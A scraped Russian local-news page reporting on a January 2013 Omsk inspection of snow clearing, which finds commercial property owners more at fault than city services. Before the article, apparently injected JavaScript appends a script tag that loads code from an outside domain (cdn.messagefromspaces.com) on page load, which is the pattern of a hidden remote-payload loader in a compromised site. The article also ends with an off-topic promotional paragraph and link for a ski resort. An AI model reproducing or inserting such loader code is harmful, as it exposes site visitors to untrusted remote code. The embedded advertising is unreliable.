, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 15 августа, 2018 года
31 января, 2013 Городские новости

В Омске прошел рейд по качеству уборки снега

В Омске прошел рейд по качеству уборки снегаВ Омске прошел рейд по качеству уборки снега. Основные претензии проверяющие предъявили не к городским, а к коммерческим структурам, которые пустили это дело на самотек.

В последнее время омичи постоянно критикуют власти по поводу несвоевременной уборки сугробов. По этой причине заметно затруднен проезд по городским магистралям, особенно в часы пик. В снегу утопают и пешеходные дорожки. Между тем, по данным мэрии, управления благоустройства работают в круглосуточном режиме.

В минувшие сутки, например, на дорогах города было задействовано 365 единиц техники, 141 из них — в ночное время. Израсходовано около 700 тонн песко-соляной смеси. Работы ведутся как механизированными звеньями, так и вручную. Ежедневно дорожные службы Омска вывозят более 5000 кубометров снега.

По словам чиновников, ответственность за состоянием улиц несут не только муниципалитет, но и коммерческие структуры.

— Согласно норме, омские предприятия и организации обязаны убирать от снега и наледи территорию, прилегающую к их киоскам, павильонам, магазинам, рынкам и другим объектам в радиусе от 5 до 20 метров, — сообщили в мэрии.

Сегодня по этому поводу в городе прошел очередной рейд. По мнению проверяющих, с дорогами и остановками в основном все в порядке, чего не скажешь об объектах, находящихся в зоне ответственности коммерсантов.

— В наш отдел постоянно поступают жалобы омичей. Через огромные сугробы приходится пробираться на работу и домой жителям улицы Малиновского. Подобное происходит и вблизи центральных магистралей, например, в районе СИБАДИ. Мы уже отправили нарушителям предписания. Если снег не исчезнет, им придется заплатить штраф, — сообщила начальник административно-технического отдела Советского округа Тамара Кутузова.

А тем временем пока Омск завален снегом и передвижение по городу затруднено, рекомендуем вам отправиться на отдых за город. Зимний отдых в Водяниках — это отличное решение для проведение своего уикенда на природе, подробную информацию вы можете получить на сайте http://mnogomest.info/winter-holiday/vodjaniki/, где вы получите исчерпывающую информацию о туристическом комплексе европейского уровня в Водяниках. На данный момент в комплекс входит три лыжных трассы, half-pipe для сноубординга, фан-парк, новые подъемники, отельные комплекс, два ресторана и снек-кафе. Есть возможность ночного катания. Это просто идеальное место для катания по выходным. Все трассы отратрачены и оснащены системами искусственного оснежения и освещения.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Городские новости